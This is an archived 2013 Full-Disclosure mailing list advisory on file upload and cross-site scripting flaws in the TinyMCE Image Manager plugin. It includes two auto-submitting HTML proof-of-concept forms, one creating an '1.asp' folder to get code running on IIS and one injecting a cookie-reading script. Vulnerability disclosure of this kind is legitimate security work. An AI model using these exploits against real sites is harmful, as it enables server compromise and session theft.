| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <004b01ce84a5$91ff21d0$9b7a6fd5@pc> Date: Fri, 19 Jul 2013 20:29:16 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>, "1337 Exploit DataBase" <mr.inj3ct0r@...il.com> Subject: AFU and XSS vulnerabilities in TinyMCE Image Manager Hello list! These are Arbitrary File Uploading and Cross-Site Scripting vulnerabilities in TinyMCE Image Manager plugin for TinyMCE. ------------------------- Affected products: ------------------------- Vulnerable are TinyMCE Image Manager 1.1 and previous versions. ------------------------- Affected vendors: ------------------------- Dustweb http://dustweb.ru/projects/tinymce_images/ ---------- Details: ---------- Arbitrary File Uploading (WASC-31): The attack is possible via "1.asp" in folder name. This is bypass method for executing arbitrary code at IIS web server. TinyMCE Image Manager AFU.html <html> <head> <title>TinyMCE Image Manager Arbitrary File Uploading exploit (C) 2013 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/tiny_mce/plugins/images/connector/php/" method="post"> <input type="hidden" name="action" value="newfolder"> <input type="hidden" name="type" value="images"> <input type="hidden" name="path" value=""> <input type="hidden" name="name" value="1.asp"> </form> </body> </html> Cross-Site Scripting (WASC-08): This is persistent XSS on Linux/Unix and reflected XSS on Windows. The code will execute just after sending request for creating a folder and later on at requests to connector (at any operations, except creating a folder with existent name). TinyMCE Image Manager XSS.html <html> <head> <title>TinyMCE Image Manager XSS exploit (C) 2013 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/tiny_mce/plugins/images/connector/php/" method="post"> <input type="hidden" name="action" value="newfolder"> <input type="hidden" name="type" value="images"> <input type="hidden" name="path" value=""> <input type="hidden" name="name" value="<body onload=alert(document.cookie)>"> </form> </body> </html> ------------ Timeline: ------------ 2013.05.22 - announced at my site. 2013.05.23 - informed developer. 2013.07.18 - disclosed at my site (http://websecurity.com.ua/6527/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists